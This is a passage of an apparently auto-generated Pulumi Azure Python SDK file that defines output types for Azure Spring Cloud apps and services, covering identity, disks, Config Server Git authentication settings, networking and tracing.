return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> str:
"""
The protocol of required traffic.
"""
return pulumi.get(self, "protocol") | sdk/python/pulumi_azure/appplatform/outputs.py |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'SpringCloudAppIdentity',
'SpringCloudAppPersistentDisk',
'SpringCloudServiceConfigServerGitSetting',
'SpringCloudServiceConfigServerGitSettingHttpBasicAuth',
'SpringCloudServiceConfigServerGitSettingRepository',
'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth',
'SpringCloudServiceConfigServerGitSettingRepositorySshAuth',
'SpringCloudServiceConfigServerGitSettingSshAuth',
'SpringCloudServiceNetwork',
'SpringCloudServiceRequiredNetworkTrafficRule',
'SpringCloudServiceTrace',
'GetSpringCloudAppIdentityResult',
'GetSpringCloudAppPersistentDiskResult',
'GetSpringCloudServiceConfigServerGitSettingResult',
'GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult',
'GetSpringCloudServiceConfigServerGitSettingRepositoryResult',
'GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult',
'GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult',
'GetSpringCloudServiceConfigServerGitSettingSshAuthResult',
'GetSpringCloudServiceRequiredNetworkTrafficRuleResult',
]
@pulumi.output_type
class SpringCloudAppIdentity(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "principalId":
suggest = "principal_id"
elif key == "tenantId":
suggest = "tenant_id"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppIdentity. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudAppIdentity.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudAppIdentity.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
principal_id: Optional[str] = None,
tenant_id: Optional[str] = None,
type: Optional[str] = None):
"""
:param str principal_id: The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str tenant_id: The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str type: Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`.
"""
if principal_id is not None:
pulumi.set(__self__, "principal_id", principal_id)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> Optional[str]:
"""
The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "principal_id")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[str]:
"""
The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class SpringCloudAppPersistentDisk(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "sizeInGb":
suggest = "size_in_gb"
elif key == "mountPath":
suggest = "mount_path"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppPersistentDisk. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudAppPersistentDisk.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudAppPersistentDisk.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
size_in_gb: int,
mount_path: Optional[str] = None):
"""
:param int size_in_gb: Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`.
:param str mount_path: Specifies the mount path of the persistent disk. Defaults to `/persistent`.
"""
pulumi.set(__self__, "size_in_gb", size_in_gb)
if mount_path is not None:
pulumi.set(__self__, "mount_path", mount_path)
@property
@pulumi.getter(name="sizeInGb")
def size_in_gb(self) -> int:
"""
Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`.
"""
return pulumi.get(self, "size_in_gb")
@property
@pulumi.getter(name="mountPath")
def mount_path(self) -> Optional[str]:
"""
Specifies the mount path of the persistent disk. Defaults to `/persistent`.
"""
return pulumi.get(self, "mount_path")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSetting(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "httpBasicAuth":
suggest = "http_basic_auth"
elif key == "searchPaths":
suggest = "search_paths"
elif key == "sshAuth":
suggest = "ssh_auth"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSetting. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSetting.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSetting.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
uri: str,
http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth'] = None,
label: Optional[str] = None,
repositories: Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']] = None,
search_paths: Optional[Sequence[str]] = None,
ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth'] = None):
"""
:param str uri: The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`.
:param 'SpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
:param Sequence['SpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param 'SpringCloudServiceConfigServerGitSettingSshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
"""
pulumi.set(__self__, "uri", uri)
if http_basic_auth is not None:
pulumi.set(__self__, "http_basic_auth", http_basic_auth)
if label is not None:
pulumi.set(__self__, "label", label)
if repositories is not None:
pulumi.set(__self__, "repositories", repositories)
if search_paths is not None:
pulumi.set(__self__, "search_paths", search_paths)
if ssh_auth is not None:
pulumi.set(__self__, "ssh_auth", ssh_auth)
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`.
"""
return pulumi.get(self, "uri")
@property
@pulumi.getter(name="httpBasicAuth")
def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auth")
@property
@pulumi.getter
def label(self) -> Optional[str]:
"""
The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def repositories(self) -> Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']]:
"""
One or more `repository` blocks as defined below.
"""
return pulumi.get(self, "repositories")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Optional[Sequence[str]]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuth")
def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingHttpBasicAuth(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
:param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepository(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "httpBasicAuth":
suggest = "http_basic_auth"
elif key == "searchPaths":
suggest = "search_paths"
elif key == "sshAuth":
suggest = "ssh_auth"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepository. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
uri: str,
http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth'] = None,
label: Optional[str] = None,
patterns: Optional[Sequence[str]] = None,
search_paths: Optional[Sequence[str]] = None,
ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth'] = None):
"""
:param str name: A name to identify on the Git repository, required only if repos exists.
:param str uri: The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`.
:param 'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
:param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param 'SpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "uri", uri)
if http_basic_auth is not None:
pulumi.set(__self__, "http_basic_auth", http_basic_auth)
if label is not None:
pulumi.set(__self__, "label", label)
if patterns is not None:
pulumi.set(__self__, "patterns", patterns)
if search_paths is not None:
pulumi.set(__self__, "search_paths", search_paths)
if ssh_auth is not None:
pulumi.set(__self__, "ssh_auth", ssh_auth)
@property
@pulumi.getter
def name(self) -> str:
"""
A name to identify on the Git repository, required only if repos exists.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`.
"""
return pulumi.get(self, "uri")
@property
@pulumi.getter(name="httpBasicAuth")
def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auth")
@property
@pulumi.getter
def label(self) -> Optional[str]:
"""
The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def patterns(self) -> Optional[Sequence[str]]:
"""
An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
"""
return pulumi.get(self, "patterns")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Optional[Sequence[str]]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuth")
def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
:param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositorySshAuth(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "privateKey":
suggest = "private_key"
elif key == "hostKey":
suggest = "host_key"
elif key == "hostKeyAlgorithm":
suggest = "host_key_algorithm"
elif key == "strictHostKeyCheckingEnabled":
suggest = "strict_host_key_checking_enabled"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepositorySshAuth. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
private_key: str,
host_key: Optional[str] = None,
host_key_algorithm: Optional[str] = None,
strict_host_key_checking_enabled: Optional[bool] = None):
"""
:param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
:param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
:param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "private_key", private_key)
if host_key is not None:
pulumi.set(__self__, "host_key", host_key)
if host_key_algorithm is not None:
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
if strict_host_key_checking_enabled is not None:
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> Optional[str]:
"""
The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> Optional[str]:
"""
The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> Optional[bool]:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingSshAuth(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "privateKey":
suggest = "private_key"
elif key == "hostKey":
suggest = "host_key"
elif key == "hostKeyAlgorithm":
suggest = "host_key_algorithm"
elif key == "strictHostKeyCheckingEnabled":
suggest = "strict_host_key_checking_enabled"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingSshAuth. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
private_key: str,
host_key: Optional[str] = None,
host_key_algorithm: Optional[str] = None,
strict_host_key_checking_enabled: Optional[bool] = None):
"""
:param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
:param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
:param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
:param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
pulumi.set(__self__, "private_key", private_key)
if host_key is not None:
pulumi.set(__self__, "host_key", host_key)
if host_key_algorithm is not None:
pulumi.set(__self__, "host_key_algorithm", host_key_algorithm)
if strict_host_key_checking_enabled is not None:
pulumi.set(__self__, "strict_host_key_checking_enabled", strict_host_key_checking_enabled)
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> str:
"""
The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
"""
return pulumi.get(self, "private_key")
@property
@pulumi.getter(name="hostKey")
def host_key(self) -> Optional[str]:
"""
The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
"""
return pulumi.get(self, "host_key")
@property
@pulumi.getter(name="hostKeyAlgorithm")
def host_key_algorithm(self) -> Optional[str]:
"""
The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
"""
return pulumi.get(self, "host_key_algorithm")
@property
@pulumi.getter(name="strictHostKeyCheckingEnabled")
def strict_host_key_checking_enabled(self) -> Optional[bool]:
"""
Indicates whether the Config Server instance will fail to start if the host_key does not match.
"""
return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceNetwork(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "appSubnetId":
suggest = "app_subnet_id"
elif key == "cidrRanges":
suggest = "cidr_ranges"
elif key == "serviceRuntimeSubnetId":
suggest = "service_runtime_subnet_id"
elif key == "appNetworkResourceGroup":
suggest = "app_network_resource_group"
elif key == "serviceRuntimeNetworkResourceGroup":
suggest = "service_runtime_network_resource_group"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceNetwork. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceNetwork.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceNetwork.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
app_subnet_id: str,
cidr_ranges: Sequence[str],
service_runtime_subnet_id: str,
app_network_resource_group: Optional[str] = None,
service_runtime_network_resource_group: Optional[str] = None):
"""
:param str app_subnet_id: Specifies the ID of the Subnet which should host the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created.
:param Sequence[str] cidr_ranges: A list of (at least 3) CIDR ranges (at least /16) which are used to host the Spring Cloud infrastructure, which must not overlap with any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created.
:param str service_runtime_subnet_id: Specifies the ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created.
:param str app_network_resource_group: Specifies the Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created.
:param str service_runtime_network_resource_group: Specifies the Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "app_subnet_id", app_subnet_id)
pulumi.set(__self__, "cidr_ranges", cidr_ranges)
pulumi.set(__self__, "service_runtime_subnet_id", service_runtime_subnet_id)
if app_network_resource_group is not None:
pulumi.set(__self__, "app_network_resource_group", app_network_resource_group)
if service_runtime_network_resource_group is not None:
pulumi.set(__self__, "service_runtime_network_resource_group", service_runtime_network_resource_group)
@property
@pulumi.getter(name="appSubnetId")
def app_subnet_id(self) -> str:
"""
Specifies the ID of the Subnet which should host the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "app_subnet_id")
@property
@pulumi.getter(name="cidrRanges")
def cidr_ranges(self) -> Sequence[str]:
"""
A list of (at least 3) CIDR ranges (at least /16) which are used to host the Spring Cloud infrastructure, which must not overlap with any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cidr_ranges")
@property
@pulumi.getter(name="serviceRuntimeSubnetId")
def service_runtime_subnet_id(self) -> str:
"""
Specifies the ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "service_runtime_subnet_id")
@property
@pulumi.getter(name="appNetworkResourceGroup")
def app_network_resource_group(self) -> Optional[str]:
"""
Specifies the Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "app_network_resource_group")
@property
@pulumi.getter(name="serviceRuntimeNetworkResourceGroup")
def service_runtime_network_resource_group(self) -> Optional[str]:
"""
Specifies the Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "service_runtime_network_resource_group")
@pulumi.output_type
class SpringCloudServiceRequiredNetworkTrafficRule(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ipAddresses":
suggest = "ip_addresses"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceRequiredNetworkTrafficRule. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
direction: Optional[str] = None,
fqdns: Optional[Sequence[str]] = None,
ip_addresses: Optional[Sequence[str]] = None,
port: Optional[int] = None,
protocol: Optional[str] = None):
"""
:param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
:param Sequence[str] fqdns: The FQDN list of required traffic.
:param int port: The port of required traffic.
:param str protocol: The protocol of required traffic.
"""
if direction is not None:
pulumi.set(__self__, "direction", direction)
if fqdns is not None:
pulumi.set(__self__, "fqdns", fqdns)
if ip_addresses is not None:
pulumi.set(__self__, "ip_addresses", ip_addresses)
if port is not None:
pulumi.set(__self__, "port", port)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
@property
@pulumi.getter
def direction(self) -> Optional[str]:
"""
The direction of required traffic. Possible values are `Inbound`, `Outbound`.
"""
return pulumi.get(self, "direction")
@property
@pulumi.getter
def fqdns(self) -> Optional[Sequence[str]]:
"""
The FQDN list of required traffic.
"""
return pulumi.get(self, "fqdns")
@property
@pulumi.getter(name="ipAddresses")
def ip_addresses(self) -> Optional[Sequence[str]]:
return pulumi.get(self, "ip_addresses")
@property
@pulumi.getter
def port(self) -> Optional[int]:
"""
The port of required traffic.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def protocol(self) -> Optional[str]:
"""
The protocol of required traffic.
"""
return pulumi.get(self, "protocol")
@pulumi.output_type
class SpringCloudServiceTrace(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "instrumentationKey":
suggest = "instrumentation_key"
elif key == "sampleRate":
suggest = "sample_rate"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceTrace. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
SpringCloudServiceTrace.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
SpringCloudServiceTrace.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
instrumentation_key: str,
sample_rate: Optional[float] = None):
"""
:param str instrumentation_key: The Instrumentation Key used for Application Insights.
:param float sample_rate: The sampling rate of Application Insights Agent. Must be between `0.0` and `100.0`. Defaults to `10.0`.
"""
pulumi.set(__self__, "instrumentation_key", instrumentation_key)
if sample_rate is not None:
pulumi.set(__self__, "sample_rate", sample_rate)
@property
@pulumi.getter(name="instrumentationKey")
def instrumentation_key(self) -> str:
"""
The Instrumentation Key used for Application Insights.
"""
return pulumi.get(self, "instrumentation_key")
@property
@pulumi.getter(name="sampleRate")
def sample_rate(self) -> Optional[float]:
"""
The sampling rate of Application Insights Agent. Must be between `0.0` and `100.0`. Defaults to `10.0`.
"""
return pulumi.get(self, "sample_rate")
@pulumi.output_type
class GetSpringCloudAppIdentityResult(dict):
def __init__(__self__, *,
principal_id: str,
tenant_id: str,
type: str):
"""
:param str principal_id: The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str tenant_id: The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
:param str type: The Type of Managed Identity assigned to the Spring Cloud Application.
"""
pulumi.set(__self__, "principal_id", principal_id)
pulumi.set(__self__, "tenant_id", tenant_id)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> str:
"""
The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "principal_id")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> str:
"""
The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> str:
"""
The Type of Managed Identity assigned to the Spring Cloud Application.
"""
return pulumi.get(self, "type")
@pulumi.output_type
class GetSpringCloudAppPersistentDiskResult(dict):
def __init__(__self__, *,
mount_path: str,
size_in_gb: int):
"""
:param str mount_path: The mount path of the persistent disk.
:param int size_in_gb: The size of the persistent disk in GB.
"""
pulumi.set(__self__, "mount_path", mount_path)
pulumi.set(__self__, "size_in_gb", size_in_gb)
@property
@pulumi.getter(name="mountPath")
def mount_path(self) -> str:
"""
The mount path of the persistent disk.
"""
return pulumi.get(self, "mount_path")
@property
@pulumi.getter(name="sizeInGb")
def size_in_gb(self) -> int:
"""
The size of the persistent disk in GB.
"""
return pulumi.get(self, "size_in_gb")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingResult(dict):
def __init__(__self__, *,
http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult'],
label: str,
repositories: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult'],
search_paths: Sequence[str],
ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult'],
uri: str):
"""
:param Sequence['GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param Sequence['GetSpringCloudServiceConfigServerGitSettingSshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
:param str uri: The URI of the Git repository
"""
pulumi.set(__self__, "http_basic_auths", http_basic_auths)
pulumi.set(__self__, "label", label)
pulumi.set(__self__, "repositories", repositories)
pulumi.set(__self__, "search_paths", search_paths)
pulumi.set(__self__, "ssh_auths", ssh_auths)
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter(name="httpBasicAuths")
def http_basic_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult']:
"""
A `http_basic_auth` block as defined below.
"""
return pulumi.get(self, "http_basic_auths")
@property
@pulumi.getter
def label(self) -> str:
"""
The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def repositories(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryResult']:
"""
One or more `repository` blocks as defined below.
"""
return pulumi.get(self, "repositories")
@property
@pulumi.getter(name="searchPaths")
def search_paths(self) -> Sequence[str]:
"""
An array of strings used to search subdirectories of the Git repository.
"""
return pulumi.get(self, "search_paths")
@property
@pulumi.getter(name="sshAuths")
def ssh_auths(self) -> Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingSshAuthResult']:
"""
A `ssh_auth` block as defined below.
"""
return pulumi.get(self, "ssh_auths")
@property
@pulumi.getter
def uri(self) -> str:
"""
The URI of the Git repository
"""
return pulumi.get(self, "uri")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult(dict):
def __init__(__self__, *,
password: str,
username: str):
"""
:param str password: The password used to access the Http Basic Authentication Git repository server.
:param str username: The username used to access the Http Basic Authentication Git repository server.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def password(self) -> str:
"""
The password used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def username(self) -> str:
"""
The username used to access the Http Basic Authentication Git repository server.
"""
return pulumi.get(self, "username")
@pulumi.output_type
class GetSpringCloudServiceConfigServerGitSettingRepositoryResult(dict):
def __init__(__self__, *,
http_basic_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult'],
label: str,
name: str,
patterns: Sequence[str],
search_paths: Sequence[str],
ssh_auths: Sequence['outputs.GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult'],
uri: str):
"""
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs'] http_basic_auths: A `http_basic_auth` block as defined below.
:param str label: The default label of the Git repository, which is a branch name, tag name, or commit-id of the repository
:param str name: Specifies The name of the Spring Cloud Service resource.
:param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
:param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
:param Sequence['GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs'] ssh_auths: A `ssh_auth` block as defined below.
:param str uri: The URI of the Git repository
"""
